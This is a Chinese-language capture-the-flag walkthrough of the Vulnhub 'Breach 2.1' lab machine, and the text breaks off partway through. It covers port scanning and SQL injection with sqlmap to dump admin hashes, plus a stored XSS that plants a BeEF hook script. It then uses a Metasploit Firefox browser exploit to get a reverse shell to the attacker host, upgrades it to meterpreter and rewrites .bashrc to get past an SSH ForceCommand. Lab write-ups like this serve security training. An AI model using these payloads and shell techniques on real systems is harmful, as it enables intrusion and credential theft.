首页 > 其他分享 >Vulnhub-Breach: 2.1

Vulnhub-Breach: 2.1

时间:2023-05-12 11:22:08浏览次数:44  
标签:110.151 0.0 192.168 exploit Vulnhub Breach 2.1 peter root

靶机地址:https://www.vulnhub.com/entry/breach-21,159/

目标:Second in a multi-part series, Breach 2.0 is a boot2root/CTF challenge which attempts to showcase a real-world scenario, with plenty of twists and trolls along the way.

提示:Imagine this as a production environment during a busy work day.

注:导入靶机后建一个快照,后面避坑。。。

一、主机发现

  • Kali:192.168.110.128

  • 靶机:192.168.110.151

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.110.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:01       VMware, Inc.
192.168.110.151 00:0c:29:a6:c7:3d       VMware, Inc.
192.168.110.254 00:50:56:f3:d9:5b       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.987 seconds (128.84 hosts/sec). 3 responded

二、端口扫描

使用全端口扫描,默认扫描只能扫常用端口和一些Nmap内置扫描端口,全端口扫描通过-p参数指定所有端口0-65535,也可使用-p-

nmap -A -p- 192.168.110.151

开放了三个端口,65535端口是SSH服务 

┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.110.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 08:28 CST
Nmap scan report for 192.168.110.151
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33838/tcp   status
|   100024  1          40648/tcp6  status
|   100024  1          41391/udp   status
|_  100024  1          49401/udp6  status
33838/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3539a0b4076b102873ea57aae859d26 (DSA)
|   2048 9aa8db784b444ffbe5836b67e3acfbf5 (RSA)
|   256 c163f1dc8f24818235fa881ab8734024 (ECDSA)
|_  256 3b4d56375ec3457515cd85004f8ba85e (ED25519)
MAC Address: 00:0C:29:A6:C7:3D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.46 ms 192.168.110.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.67 seconds

三、80端口

攻击SSH使80端口开放

SSH连接提示peter的密码是inthesource,而且这里的peter是全小写

  • 用户名:peter

  • 密码:inthesource

连接失败,密码应该是对的,只是故意不给连接

┌──(root㉿kali)-[~]
└─# ssh [email protected] -p65535
The authenticity of host '[192.168.110.151]:65535 ([192.168.110.151]:65535)' can't be established.
ED25519 key fingerprint is SHA256:WSPZzGZPdZTVSHsFqYGt5lN1jqIM3ONgy68WbaOlZQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.110.151]:65535' (ED25519) to the list of known hosts.
#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded                #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
[email protected]'s password: 
Connection to 192.168.110.151 closed.

再次扫端口竟然跑出来了个80端口的http服务,就是SSH连接peter用户成功才开放的。。。

nmap -sV -p- 192.168.110.151

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.110.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 08:44 CST
Nmap scan report for 192.168.110.151
Host is up (0.0037s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
33838/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
MAC Address: 00:0C:29:A6:C7:3D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.66 seconds

四、Web渗透

访问网站并查看源码,又是两句看不懂的废话,真是说话自带加密算法

解密一下

我喜欢暗示!在Initech,我们不信任我们的用户,你也不应该信任!
我不只是要在这里坚持信用,真的,我不是。很抱歉

扫目录,发现blog

dirb http://192.168.110.151/

┌──(root㉿kali)-[~]
└─# dirb http://192.168.110.151/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed May 10 08:56:58 2023
URL_BASE: http://192.168.110.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.110.151/ ----
==> DIRECTORY: http://192.168.110.151/blog/
==> DIRECTORY: http://192.168.110.151/images/
+ http://192.168.110.151/index.html (CODE:200|SIZE:468)
+ http://192.168.110.151/server-status (CODE:403|SIZE:303)

---- Entering directory: http://192.168.110.151/blog/ ----
+ http://192.168.110.151/blog/index.php (CODE:200|SIZE:5600)
+ http://192.168.110.151/blog/README (CODE:200|SIZE:721)
==> DIRECTORY: http://192.168.110.151/blog/smilies/
==> DIRECTORY: http://192.168.110.151/blog/wysiwyg/

---- Entering directory: http://192.168.110.151/images/ ----

---- Entering directory: http://192.168.110.151/blog/smilies/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.110.151/blog/wysiwyg/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Wed May 10 08:57:06 2023
DOWNLOADED: 13836 - FOUND: 4

访问发现是一个博客,在搜索框输入SQL注入测试语句1' or 1=1#发现存在注入

SQLMap一把梭,爆出数据库blog

sqlmap -u "http://192.168.110.151/blog/index.php?search=" --dbs

available databases [5]:
[*] blog
[*] information_schema
[*] mysql
[*] oscommerce
[*] performance_schema

最后找到个类似有用的登录口令

sqlmap -u "http://192.168.110.151/blog/index.php?search=" -D "oscommerce" -T "osc_administrators" --dump

Database: oscommerce
Table: osc_administrators
[1 entry]
+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
| 1  | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+

MD5解密:https://www.somd5.com/

注:因为密码加盐处理,去掉32即为密码(admin)

  • 用户名:admin

  • 密码:admin

尝试SSH登录

ssh [email protected] -p65535

┌──(root㉿kali)-[~]
└─# ssh [email protected] -p65535
#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded                #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   # 
#############################################################################
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
[email protected]: Permission denied (publickey,password).

尝试blog网站登录

均以失败告终,只能另寻它法。

经过测试,这个网站没有对用户输入进行任何过滤,搜索框存在反射型XSS、注册页面存在存储型XSS。

由于注册时没有对输入的用户名进行防护,导致将构造的XSS语句存入了数据库,查看个人信息将会触发用户名的XSS语句

<script>alert(0)</script>

用户名插入一句XSS,密码和邮箱随便填,点击Register

注册成功之后点击Members

触发存储型XSS

可尝试利用存储型XSS获取WebShell

五、XSS拿Shell

结合网站首页图片的提示,可用BeEF框架进行攻击,BeEF是一个专门利用XSS进行攻击的框架,集成了许多XSS攻击的模块。

开启beef-xss

beef-xss

┌──(root㉿kali)-[~]
└─# beef-xss

[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2023-05-10 09:34:33 CST; 5s ago
   Main PID: 67501 (ruby)
      Tasks: 4 (limit: 4571)
     Memory: 98.5M
        CPU: 928ms
     CGroup: /system.slice/beef-xss.service
             └─67501 ruby /usr/share/beef-xss/beef

5月 10 09:34:35 kali beef[67501]: [ 9:34:34]    |   Blog: http://blog.beefproject.com
5月 10 09:34:35 kali beef[67501]: [ 9:34:34]    |_  Wiki: https://github.com/beefproject/beef/wiki
5月 10 09:34:35 kali beef[67501]: [ 9:34:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)
5月 10 09:34:35 kali beef[67501]: -- migration_context()
5月 10 09:34:35 kali beef[67501]:    -> 0.0117s
5月 10 09:34:35 kali beef[67501]: [ 9:34:35][*] BeEF is loading. Wait a few seconds...
5月 10 09:34:35 kali beef[67501]: [ 9:34:35][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScrip…on: harmony
5月 10 09:34:35 kali beef[67501]: [ 9:34:35]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
5月 10 09:34:35 kali beef[67501]: [ 9:34:35][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScrip…on: harmony
5月 10 09:34:35 kali beef[67501]: [ 9:34:35]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
Hint: Some lines were ellipsized, use -l to show in full.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

自动跳转Web页面,使用设置口令登录BeEF

再次去注册用户的username中插入XSS语句,密码邮箱随意,点击注册,然后再访问Members触发XSS

注:没有登出链接,需要清除浏览器缓存刷新退出登录(真无语。。。)

<script src="http://<IP>:3000/hook.js"></script>

等待触发XSS后BeEF成功连接上,这里需要等一段时间,因为靶机会自己去触发这个XSS漏洞,只能等

注:不能注入有弹窗XSS,不然靶机会触发XSS失败导致BeEF无法连上靶机(这里删除重新导入靶机。。。)

采用msf的浏览器攻击模块获取会话,因为靶机用的是火狐浏览器,所以选用火狐模块攻击

msfconsole

search firefox

use exploit/multi/browser/firefox_proto_crmfrequest

┌──(root㉿kali)-[~]
└─# msfconsole


                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v6.2.36-dev                          ]
+ -- --=[ 2277 exploits - 1191 auxiliary - 408 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can use help to view all 
available commands
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search firefox

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/windows/browser/adobe_flashplayer_avm                  2011-03-15       good       No     Adobe Flash Player AVM Bytecode Verification Vulnerability
   1   exploit/windows/browser/adobe_flashplayer_arrayindexing        2012-06-21       great      No     Adobe Flash Player AVM Verification Logic Array Indexing Code Execution
   2   exploit/multi/browser/adobe_flash_uncompress_zlib_uaf          2014-04-28       great      No     Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free
   3   exploit/multi/browser/adobe_flash_hacking_team_uaf             2015-07-06       great      No     Adobe Flash Player ByteArray Use After Free
   4   exploit/osx/browser/adobe_flash_delete_range_tl_op             2016-04-27       great      No     Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion
   5   exploit/multi/browser/adobe_flash_shader_drawing_fill          2015-05-12       great      No     Adobe Flash Player Drawing Fill Shader Memory Corruption
   6   exploit/multi/browser/adobe_flash_nellymoser_bof               2015-06-23       great      No     Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow
   7   exploit/multi/browser/adobe_flash_net_connection_confusion     2015-03-12       great      No     Adobe Flash Player NetConnection Type Confusion
   8   exploit/multi/browser/adobe_flash_pixel_bender_bof             2014-04-28       great      No     Adobe Flash Player Shader Buffer Overflow
   9   exploit/multi/browser/adobe_flash_shader_job_overflow          2015-05-12       great      No     Adobe Flash Player ShaderJob Buffer Overflow
   10  exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array  2014-09-23       great      No     Adobe Flash Player copyPixelsToByteArray Method Integer Overflow
   11  exploit/multi/browser/adobe_flash_opaque_background_uaf        2015-07-06       great      No     Adobe Flash opaqueBackground Use After Free
   12  exploit/windows/browser/apple_quicktime_rtsp                   2007-01-01       normal     No     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
   13  exploit/windows/browser/apple_quicktime_texml_font_table       2012-11-07       normal     No     Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow
   14  exploit/windows/misc/itunes_extm3u_bof                         2012-06-21       normal     No     Apple iTunes 10 Extended M3U Stack Buffer Overflow
   15  exploit/windows/browser/awingsoft_winds3d_sceneurl             2009-11-14       excellent  No     AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
   16  payload/firefox/shell_bind_tcp                                                  normal     No     Command Shell, Bind TCP (via Firefox XPCOM script)
   17  payload/firefox/shell_reverse_tcp                                               normal     No     Command Shell, Reverse TCP (via Firefox XPCOM script)
   18  exploit/multi/browser/firefox_svg_plugin                       2013-01-08       excellent  No     Firefox 17.0.1 Flash Privileged Code Injection
   19  exploit/multi/browser/firefox_escape_retval                    2009-07-13       normal     No     Firefox 3.5 escape() Return Value Memory Corruption
   20  exploit/multi/browser/firefox_proto_crmfrequest                2013-08-06       excellent  No     Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution
   21  exploit/windows/browser/mozilla_attribchildremoved             2011-12-06       average    No     Firefox 8/9 AttributeChildRemoved() Use-After-Free
   22  exploit/firefox/local/exec_shellcode                           2014-03-10       excellent  No     Firefox Exec Shellcode from Privileged Javascript Shell
   23  post/firefox/gather/cookies                                    2014-03-26       normal     No     Firefox Gather Cookies from Privileged Javascript Shell
   24  post/firefox/gather/history                                    2014-04-11       normal     No     Firefox Gather History from Privileged Javascript Shell
   25  post/firefox/gather/passwords                                  2014-04-11       normal     No     Firefox Gather Passwords from Privileged Javascript Shell
   26  exploit/multi/browser/firefox_jit_use_after_free               2020-11-18       manual     No     Firefox MCallGetProperty Write Side Effects Use After Free Exploit
   27  auxiliary/gather/firefox_pdfjs_file_theft                                       normal     No     Firefox PDF.js Browser File Theft
   28  exploit/multi/browser/firefox_pdfjs_privilege_escalation       2015-03-31       manual     No     Firefox PDF.js Privileged Javascript Injection
   29  exploit/multi/browser/firefox_proxy_prototype                  2014-01-20       manual     No     Firefox Proxy Prototype Privileged Javascript Injection
   30  exploit/multi/browser/firefox_webidl_injection                 2014-03-17       excellent  No     Firefox WebIDL Privileged Javascript Injection
   31  post/firefox/manage/webcam_chat                                2014-05-13       normal     No     Firefox Webcam Chat on Privileged Javascript Shell
   32  exploit/windows/browser/mozilla_firefox_xmlserializer          2013-01-08       normal     No     Firefox XMLSerializer Use After Free
   33  payload/firefox/exec                                                            normal     No     Firefox XPCOM Execute Command
   34  post/firefox/gather/xss                                                         normal     No     Firefox XSS
   35  exploit/multi/browser/firefox_queryinterface                   2006-02-02       normal     No     Firefox location.QueryInterface() Code Execution
   36  exploit/windows/browser/firefox_smil_uaf                       2016-11-30       normal     No     Firefox nsSMILTimeContainer::NotifyTimeChange() RCE
   37  exploit/windows/browser/mozilla_nssvgvalue                     2011-12-06       average    No     Firefox nsSVGValue Out-of-Bounds Access Vulnerability
   38  exploit/windows/browser/mozilla_firefox_onreadystatechange     2013-06-25       normal     No     Firefox onreadystatechange Event DocumentViewerImpl Use After Free
   39  exploit/multi/browser/firefox_tostring_console_injection       2013-05-14       excellent  No     Firefox toString console.time Privileged Javascript Injection
   40  exploit/windows/browser/foxit_reader_plugin_url_bof            2013-01-07       normal     No     Foxit Reader Plugin URL Processing Buffer Overflow
   41  auxiliary/dos/http/gzip_bomb_dos                               2004-01-01       normal     No     Gzip Memory Bomb Denial Of Service
   42  exploit/multi/browser/java_jre17_exec                          2012-08-26       excellent  No     Java 7 Applet Remote Code Execution
   43  exploit/multi/browser/java_rhino                               2011-10-18       excellent  No     Java Applet Rhino Script Engine Remote Code Execution
   44  exploit/windows/browser/mozilla_nstreerange                    2011-02-02       normal     No     Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability
   45  exploit/osx/browser/mozilla_mchannel                           2011-05-10       normal     No     Mozilla Firefox 3.6.16 mChannel Use-After-Free
   46  exploit/windows/browser/mozilla_mchannel                       2011-05-10       normal     No     Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability
   47  exploit/windows/browser/mozilla_reduceright                    2011-06-21       normal     No     Mozilla Firefox Array.reduceRight() Integer Overflow
   48  exploit/multi/browser/firefox_xpi_bootstrapped_addon           2007-06-27       excellent  No     Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   49  exploit/windows/browser/mozilla_interleaved_write              2010-10-25       normal     No     Mozilla Firefox Interleaved document.write/appendChild Memory Corruption
   50  exploit/multi/browser/mozilla_navigatorjava                    2006-07-25       normal     No     Mozilla Suite/Firefox Navigator Object Code Execution
   51  exploit/multi/browser/mozilla_compareto                        2005-07-13       normal     No     Mozilla Suite/Firefox compareTo() Code Execution
   52  post/multi/gather/firefox_creds                                                 normal     No     Multi Gather Firefox Signon Credential Collection
   53  post/multi/gather/ssh_creds                                                     normal     No     Multi Gather OpenSSH PKI Credentials Collection
   54  post/multi/manage/play_youtube                                                  normal     No     Multi Manage YouTube Broadcast
   55  exploit/windows/browser/samsung_security_manager_put           2016-08-05       excellent  No     Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution
   56  auxiliary/server/teamviewer_uri_smb_redirect                                    normal     No     TeamViewer Unquoted URI Handler SMB Redirect
   57  post/multi/manage/hsts_eraser                                                   normal     No     Web browsers HSTS entries eraser
   58  exploit/windows/browser/ms07_017_ani_loadimage_chunksize       2007-03-28       great      No     Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   59  exploit/windows/local/ms15_051_client_copy_image               2015-05-12       normal     Yes    Windows ClientCopyImage Win32k Exploit
   60  post/windows/gather/forensics/browser_history                                   normal     No     Windows Gather Skype, Firefox, and Chrome Artifacts
   61  exploit/windows/browser/dxstudio_player_exec                   2009-06-09       excellent  No     Worldweaver DX Studio Player shell.execute() Command Execution


Interact with a module by name or index. For example info 61, use 61 or use exploit/windows/browser/dxstudio_player_exec

msf6 > use exploit/multi/browser/firefox_proto_crmfrequest
[*] No payload configured, defaulting to generic/shell_reverse_tcp
msf6 exploit(multi/browser/firefox_proto_crmfrequest) >

设置参数,执行

show options

set SRVHOST 192.168.110.128

set URIPATH msf

set LHOST 192.168.110.128

set LPORT 5868

run

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > show options

Module options (exploit/multi/browser/firefox_proto_crmfrequest):

   Name           Current Setting               Required  Description
   ----           ---------------               --------  -----------
   ADDONNAME      HTML5 Rendering Enhancements  yes       The addon name.
   AutoUninstall  true                          yes       Automatically uninstall the addon after payload execution
   CONTENT                                      no        Content to display inside the HTML <body>.
   Retries        true                          no        Allow the browser to retry the module
   SRVHOST        0.0.0.0                       yes       The local host or network interface to listen on. This must be an address on the loca
                                                          l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080                          yes       The local port to listen on.
   SSL            false                         no        Negotiate SSL for incoming connections
   SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                      no        The URI to use for this exploit (default is random)


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal (Javascript XPCOM Shell)



View the full module info with the info, or info -d command.

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set SRVHOST 192.168.110.128
SRVHOST => 192.168.110.128
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set URIPATH msf
URIPATH => msf
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set LHOST 192.168.110.128
LHOST => 192.168.110.128
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > set LPORT 5868
LPORT => 5868
msf6 exploit(multi/browser/firefox_proto_crmfrequest) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.110.128:5868 
[*] Using URL: http://192.168.110.128:8080/msf
[*] Server started.
msf6 exploit(multi/browser/firefox_proto_crmfrequest) >

msf生成一个链接,靶机访问就会攻击浏览器然后建立一个会话

http://192.168.110.128:8080/msf

通过BeEF的Redirect Browser(重定向)访问生成的链接

注:要快一点,不然靶机会下线

成功建立会话

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > 
[*] 192.168.110.151  firefox_proto_crmfrequest - Gathering target information for 192.168.110.151
[*] 192.168.110.151  firefox_proto_crmfrequest - Sending HTML response to 192.168.110.151
[*] 192.168.110.151  firefox_proto_crmfrequest - Sending HTML
[*] 192.168.110.151  firefox_proto_crmfrequest - Sending the malicious addon
[*] Command shell session 1 opened (192.168.110.128:5868 -> 192.168.110.151:41228) at 2023-05-10 10:39:39 +0800

sessions查看是否有会话,没有则继续等继续刷新,并将会话迁移到meterpreter便于后续操作

sessions

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         shell firefox/firefox               192.168.110.128:5868 -> 192.168.110.151:41228 (192.168.110.151)

use post/multi/manage/shell_to_meterpreter

set session 1

run

msf6 exploit(multi/browser/firefox_proto_crmfrequest) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: firefox
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.110.128:4433 
[*] Sending stage (1017704 bytes) to 192.168.110.151
[*] Meterpreter session 2 opened (192.168.110.128:4433 -> 192.168.110.151:52122) at 2023-05-10 11:27:35 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information              Connection
  --  ----  ----                   -----------              ----------
  1         shell firefox/firefox                           192.168.110.128:5868 -> 192.168.110.151:41335 (192.168.110.151)
  2        meterpreter x86/linux  peter @ 192.168.110.151  192.168.110.128:4433 -> 192.168.110.151:52122 (192.168.110.151)

msf6 post(multi/manage/shell_to_meterpreter) >

选meterpreter会话,当前用户正是peter

msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter > shell
Process 2139 created.
Channel 1 created.
whoami
peter

优化SHELL

python -c 'import pty; pty.spawn("/bin/bash")'

python -c 'import pty; pty.spawn("/bin/bash")'
peter@breach2:~$ pwd
pwd
/home/peter
peter@breach2:~$

因为刚刚peter连接SSH时被踢出来了,所以先看看SSH的配置文件

cat /etc/ssh/sshd_config

peter@breach2:~$ cat /etc/ssh/sshd_config
cat /etc/ssh/sshd_config
# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 65535
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin no
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
AllowUsers peter
ForceCommand /usr/bin/startme
AddressFamily inet

可以看到SSH登录peter就执行一个startme程序,查看源码,就是开启apache服务, 所以登录成功peter才开放80端口,而之所以登录成功就被踢出来,则是因为SSH连接peter用户只执行了startme程序就断开连接,那么就想办法使ssh连接peter时调用一个sh命令行

cat /usr/bin/startme

peter@breach2:~$ cat /usr/bin/startme
cat /usr/bin/startme
#!/bin/bash

sudo /etc/init.d/apache2 start &> /dev/null

注:ForceCommand

  • 强制执行这里指定的命令而忽略客户端提供的任何命令。这个命令将使用用户的登录shell执行(shell -c)。

  • 这可以应用于 shell 、命令、子系统的完成,通常用于 Match 块中。

  • 这个命令最初是在客户端通过 SSH_ORIGINAL_COMMAND 环境变量来支持的。

用户主目录下有个隐藏文件.bashrc,每次执行bash时都会加载,也可以理解为当登录peter用户时就会去加载peter主目录下的.bashrc。因为当前用户是peter,所以对peter主目录下的文件拥有可写权限,只要在.bashrc文件下写入exec sh,那么就能在SSH连接peter用户时就会执行exec sh命令,从而调用一个命令行。

ls -al

echo 'exec sh' > .bashrc

peter@breach2:~$ ls -al
ls -al
total 108
drwxr-xr-x 19 peter peter 4096 Jul 20  2016 .
drwxr-xr-x  5 root  root  4096 Jun 19  2016 ..
-rw-------  1 peter peter  636 Jun 14  2016 .ICEauthority
-rw-------  1 peter peter    0 Jun 18  2016 .Xauthority
-rw-------  1 peter peter    5 Jul 20  2016 .bash_history
-rw-r--r--  1 peter peter  220 Jun 14  2016 .bash_logout
-rw-r--r--  1 peter peter 3515 Jun 14  2016 .bashrc
drwx------  7 peter peter 4096 Jun 19  2016 .cache
drwx------ 12 peter peter 4096 Jun 19  2016 .config
drwx------  3 peter peter 4096 Jun 19  2016 .dbus
-rw-------  1 peter peter   26 Jun 18  2016 .dmrc
drwx------  3 peter peter 4096 Jun 19  2016 .gconf
drwx------  2 peter peter 4096 Jun 19  2016 .gnupg
drwx------  4 peter peter 4096 Jun 19  2016 .kde
drwx------  3 peter peter 4096 Jun 19  2016 .local
drwx------  4 peter peter 4096 Jun 19  2016 .mozilla
-rw-r--r--  1 peter peter  675 Jun 14  2016 .profile
-rw-r--r--  1 peter peter   66 Jun 15  2016 .selected_editor
drwx------  2 peter peter 4096 Jun 19  2016 .ssh
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Desktop
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Documents
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Downloads
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Music
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Pictures
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Public
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Templates
drwxr-xr-x  2 peter peter 4096 Jun 19  2016 Videos
-rwxr-xr-x  1 peter peter  118 Jun 19  2016 firefox.sh
peter@breach2:~$ echo 'exec sh' > .bashrc
echo 'exec sh' > .bashrc
peter@breach2:~$ cat .bashrc                 
cat .bashrc
exec sh

注:.bashrc

